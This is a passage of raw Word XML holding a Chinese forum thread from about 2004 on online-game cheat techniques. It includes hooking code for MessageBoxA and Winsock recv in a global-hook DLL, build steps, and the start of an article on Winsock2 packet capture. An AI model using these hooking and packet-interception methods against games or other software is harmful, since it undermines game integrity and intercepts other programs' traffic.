        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置挡截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>User32.dll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MessageBoxA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>HookAPIByName(GetModuleHandle(NULL),"User32.dll",&amp;api[0]);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置挡截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Wsock32.dll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>recv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>HookAPIByName(GetModuleHandle(NULL),"Wsock32.dll",&amp;api[1]);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">...... </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(6) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ActiveKey.cpp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中加入头文件声明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> "#include "wsock32.h"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>从“工程”菜单中选择“设置”，弹出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Project Setting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对话框，选择</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Link</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标签，在“对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库模块”中输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Ws2_32..lib</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(7) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重新编译</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ActiveKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目，产生</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ActiveKey.dll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，将其拷贝到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Simulate.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录下。运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Simulate.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并启动全局钩子。激活任意应用程序，按</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>F11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>键后，运行此程序中可能调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MessageBoxA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数的操作，看看信息框是不是有所变化。同样，如此程序正在接收网络数据包，就可以实现封包功能了。既然不能洁身自好，不如就同流合污吧。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我的群：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3595054  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">UID41288 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>帖子</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">34145 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>精华</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>积分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">68377 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现金</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>482  cfan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>币</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">0  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>阅读权限</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">120 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来自我忘记了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在线时间</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">835 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>小时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册时间</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2003-12-17 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2010-3-10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看个人网站</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看详细资料</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve"> TOP </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">zdd_807 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CFan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大学士</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个人空间</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发短消息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加为好友</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当前离线</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>楼</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>小</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发表于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2004-7-8 13:06  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只看该作者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>六、结束语</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　除了以上介绍的几种游戏外挂程序常用的技术以外，在一些外挂程序中还使用了游戏数据修改技术、游戏加速技术等。在这篇文章里，就不逐一介绍了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>goodmorning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集整理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请勿删</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络游戏外挂核心封包揭密</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络游戏的封包技术是大多数编程爱好者都比较关注的关注的问题之一，在这里就让我们一起研究一下这一个问题吧。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　别看这是封包这一问题，但是涉及的技术范围很广范，实现的方式也很多（比如说</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>APIHOOK,VXD,Winsock2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都可以实现），在这里我们不可能每种技术和方法都涉及，所以我在这里以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Winsock2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>技术作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>详细讲解，就算作抛砖引玉。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　由于大多数读者对封包类编程不是很了解，我在这里就简单介绍一下相关知识：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>APIHooK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　由于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的把内核提供的功能都封装到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里面，所以大家要实现功能就必须通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，换句话说就是我们要想捕获数据封包，就必须先要得知道并且捕获这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里面得到封包信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VXD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　直接通过控制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VXD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>驱动程序来实现封包信息的捕获，不过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VXD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只能用于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>win9X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>winsock2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>winsock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络编程接口，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>winsock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工作在应用层，它提供与底层传输协议无关的高层数据传输编程接口，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>winsock2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>winsock2.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供的服务提供者接口，但只能在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>win2000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　好了，我们开始进入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>winsock2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>封包式编程吧。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
